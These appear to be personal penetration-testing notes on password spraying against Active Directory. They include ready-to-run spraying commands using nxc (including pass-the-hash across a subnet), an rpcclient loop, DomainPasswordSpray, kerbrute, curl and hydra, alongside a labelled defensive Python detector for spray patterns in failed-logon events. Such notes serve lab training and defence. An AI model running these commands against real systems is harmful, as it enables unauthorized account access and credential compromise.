Password spraying

active_directory_enumeration_attacks breachingad passwordattacks

Password spraying is currently the most commonly used technique for finding a working credential pair.

We select a password and test it against a list of usernames. After a delay, we repeat this step with another password. 🤖

Many companies have a password policy that includes account lockout after a certain number of failed attempts, which makes brute force impractical since we would lock out every account we tried.
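The same property that makes spraying practical for the attacker (one password across many accounts, so each account sees only one or two failures and never trips the lockout threshold) is what a defender can look for in failed-logon telemetry. The snippet below is an added example, not part of the original notes; the event format and the records in SAMPLE_4625 are constructed, not real data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4625 (failed logon) records,
# reduced to "timestamp,source_ip,target_user". Not real telemetry.
SAMPLE_4625 = """\
2024-05-01T09:00:01Z,10.0.0.50,alice
2024-05-01T09:00:02Z,10.0.0.50,bob
2024-05-01T09:00:03Z,10.0.0.50,carol
2024-05-01T09:00:04Z,10.0.0.50,dave
2024-05-01T09:00:05Z,10.0.0.50,erin
2024-05-01T09:00:06Z,10.0.0.50,frank
2024-05-01T09:10:00Z,10.0.0.77,alice
2024-05-01T09:10:01Z,10.0.0.77,alice
2024-05-01T09:10:02Z,10.0.0.77,alice
2024-05-01T09:10:03Z,10.0.0.77,alice
2024-05-01T09:30:00Z,10.0.0.9,gina
2024-05-01T09:30:40Z,10.0.0.9,gina
"""

def parse_events(text):
    """Parse 'timestamp,source_ip,target_user' lines into sorted tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, user))
    return sorted(events)

def detect_spray(events, window=timedelta(minutes=5), min_users=5, max_per_user=2):
    """Flag a source that fails logons for many distinct users inside the
    window while hitting each user only a few times: the spray signature
    (one password, many accounts) as opposed to brute force (one account,
    many passwords), which the lockout policy already covers."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    alerts = []
    for src, items in by_src.items():          # items are time-ordered
        for i, (start, _) in enumerate(items):
            in_window = [u for ts, u in items[i:] if ts - start <= window]
            per_user = defaultdict(int)
            for u in in_window:
                per_user[u] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts.append({"source": src, "users": len(per_user), "start": start})
                break                            # one alert per source
    return alerts
```

With the sample above only 10.0.0.50 is flagged; 10.0.0.77 is a single-account brute force and 10.0.0.9 is ordinary user error.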

Some tools you might use:

Many network authentication tools can be used, such as hydra with -C.


Windows Credentials Password spraying

Leveraging SMB

active_directory_enumeration_attacks

You can use SMB:

$ nxc smb IP -u wordlist -p PasswordHere
$ nxc smb IP -u wordlist -p PasswordHere | grep +
$ nxc smb --local-auth CIDR -u administrator -H hash | grep +

Leveraging RPC

active_directory_enumeration_attacks

A crude but straightforward RPC password spray:

$ for u in $(cat wordlist);do rpcclient -U "$u%PasswordHere" -c "getusername;quit" IP | grep Authority; done

Leveraging A Domain-joined Host

active_directory_enumeration_attacks

You may use DomainPasswordSpray (1.6k ⭐):

PS> Import-Module .\DomainPasswordSpray.ps1
PS> Invoke-DomainPasswordSpray -Password PasswordHere -OutFile output.txt -ErrorAction SilentlyContinue

Leveraging Kerberos Authentication Module

active_directory_enumeration_attacks

We can use kerbrute:

$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword

HTTP LDAP Credentials Password spraying

breachingad

We can use curl to test a pair of credentials:

$ curl URL -u "username:password" --ntlm

We can also use tools such as hydra:

$ hydra -L usernames.txt -p password example.com http-get

👻 To-do 👻

Stuff that I found, but never read/used yet.